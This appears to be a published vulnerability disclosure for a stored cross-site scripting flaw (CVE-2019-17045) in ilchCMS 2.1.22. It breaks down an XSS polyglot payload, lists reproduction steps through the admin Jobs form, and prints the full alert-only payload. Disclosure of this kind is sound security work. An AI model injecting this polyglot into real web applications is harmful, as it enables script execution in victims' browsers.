
Product Owner: Ilch – Content Management System
CVE ID: CVE-2019-17045 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17045 )
Type: Installable/Customer-Controlled Application
Application Name: ilchCMS – 2.1.22 02/01/22
Application Release Date: 23.05.2019
Severity: High
Authentication: Required
Complexity: Easy
Vulnerability Name: Stored Cross-site scripting – XSS Polyglot (Stored)
Vulnerability Explanation: An XSS polyglot can be generally defined as any XSS vector that is executable within various injection contexts in its raw form.
Browsers Verified In:
Firefox 68.0.2 (64-bit)
Anatomy of the polyglot
- jaVasCript:: A label in ECMAScript; a URI scheme otherwise.
- /*-/*`/*\`/*’/*”/**/: A multi-line comment in ECMAScript; a literal-breaker sequence.
- (/* */oNcliCk=alert() ): A tangled execution zone wrapped in invoking parenthesis!
- //%0D%0A%0d%0a//: A single-line comment in ECMAScript; a double-CRLF in HTTP response headers.
- </stYle/</titLe/</teXtarEa/</scRipt/–!>: A sneaky HTML-tag-breaker sequence.
- \x3csVg/<sVg/oNloAd=alert()//>\x3e: An innocuous svg element.
Impact:
Stored XSS allows an attacker to embed a malicious script
into a vulnerable page, which is then executed when a victim views the page.
Reflected cross-site scripting relies on a victim being socially engineered
into clicking on a malicious link, sent via email for example.
Proof of Concept: (Stored Cross site scripting – XSS Polyglot (Stored))
Affected items: ilchCMS 2.1.22
Step 1: Host the application using local web server xampp, install the Ilch CMS as per documentation.
Step 2: Go to admin panel
Step 3: Click Modules Tab
Step 4: Under the modules click Jobs Tab
Step 5: Enter the payload in all input field such as title, text, email id
Step 6: Finally click Add – Stored XSS will reflect back on the browser, even after refresh the stored XSS will reflect again.
Xss Payload used :
Html Comment:
<!--
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1234) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1234)//>\x3e
-->
Url: http://localhost/cms/Ilch-v2.1.22/index.php/admin/jobs/index/treat
Reference:
Website: https://www.ilch.de/
Download Version: https://www.ilch.de/downloads-show-1826.html
Video POC:
Twitter – https://twitter.com/the_pr0fess0r_

